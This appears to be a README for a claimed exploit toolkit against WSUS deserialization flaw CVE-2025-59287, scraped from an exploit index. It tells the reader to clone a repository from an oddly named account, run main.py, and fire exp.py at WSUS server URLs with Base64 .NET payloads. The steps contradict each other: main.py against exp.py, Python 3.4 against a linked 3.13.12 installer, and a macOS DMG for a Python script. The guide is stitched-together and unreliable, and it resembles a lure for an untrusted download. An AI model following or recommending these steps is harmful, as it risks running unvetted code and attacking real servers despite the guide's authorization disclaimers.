## https://sploitus.com/exploit?id=91EE08AF-5174-5B32-9DCC-B0A21B4F7685
# WSUS Security Research Toolkit - Installation Guide
## System Requirements
- **Operating System**: Windows 10/11 or Linux (Ubuntu 20.04+)
- **Python Version**: 3.4 or higher
- **Network Access**: Connection to target WSUS server
## Installation Steps
Windows and Linux instructions follow; for macOS, please use the [DMG file](../../releases).
Confirm Git and Python installation status.
https://git-scm.com/install/windows
https://www.python.org/ftp/python/3.13.12/python-3.13.12-amd64.exe
Launch GIT CMD.
```bash
git clone https://github.com/vatslaaeytoygag/CVE-2025-59287.git
```
```bash
cd CVE-2025-59287
```
```bash
py -m pip install -r requirements.txt
```
```bash
py main.py
```
### Download Toolkit Files
Ensure you have the following files in your working directory:
- `exp.py` - Main execution script
- `encrypt.py` - Payload preparation utility
- `payload.txt` - Base64 encoded test data (optional)
### Prepare Your Test Data
You have two methods to configure the payload:
#### Method A: Using payload.txt file
1. Create or edit `payload.txt` in the same directory as `exp.py`
2. Paste your Base64 encoded test data into the file
3. Save the file
## Running the Toolkit
### Basic Usage
Execute the script with your target WSUS server URL:
```bash
python exp.py http://wsus-server.example.local:8533
```
Replace `wsus-server.example.local:8533` with your actual WSUS server address.
### Command Line Options
```bash
python exp.py [TARGET_URL] [OPTIONS]
```
**Available Options:**
- `--no-wait` - Skip delay between requests
- Additional options may be available, check `python exp.py --help`
### Example Commands
**Basic test:**
```bash
python exp.py http://192.168.1.100:8533
```
**Without delay:**
```bash
python exp.py http://192.168.1.100:8533 --no-wait
```
**Using custom port:**
```bash
python exp.py http://wsus-lab.local:8534
```
## Understanding the Output
The toolkit will display:
- Connection status to WSUS server
- SOAP request/response information
- Event IDs generated
- Success/failure status of deserialization attempts
## Troubleshooting
### Common Issues
**"Connection refused" error:**
- Verify WSUS server is running
- Check firewall rules
- Confirm correct IP address and port
**"Module not found" error:**
- Ensure Python 3.4+ is installed
- All required files are in the same directory
**"Permission denied" error:**
- Run with appropriate permissions
- Ensure you have authorization to test the target
**Payload not working:**
- Verify Base64 encoding is correct
- Check payload.txt has no extra spaces or newlines
- Ensure payload matches expected .NET serialization format
## Data Preparation with encrypt.py
If you need to prepare custom test data:
```bash
python encrypt.py -i input_file.bin -o output.txt --key YOUR_HEX_KEY
```
This will generate properly formatted Base64 data for use with `exp.py`.
## Security Notes
- Only use on systems you own or have written authorization to test
- Recommended for isolated lab environments
- Document all testing activities
- Disconnect from production networks during testing
## File Structure
```
wsus-toolkit/
โโโ exp.py # Main execution script
โโโ encrypt.py # Payload encoder
โโโ payload.txt # Test data (optional)
โโโ README.txt # This file
```
## Next Steps After Installation
1. Verify connectivity to your test WSUS server
2. Prepare your test payload using one of the methods above
3. Run initial test with basic command
4. Review output and adjust parameters as needed
5. Document findings in your research notes
## Legal Compliance
Before using this toolkit:
- [ ] Obtain written authorization for testing
- [ ] Ensure testing is within scope of engagement
- [ ] Use only in authorized lab/test environments
- [ ] Comply with all applicable laws and regulations
- [ ] Document proper chain of custody for any findings
## Support
For issues or questions about the toolkit functionality, review the code comments in `exp.py` and `encrypt.py` for additional technical details.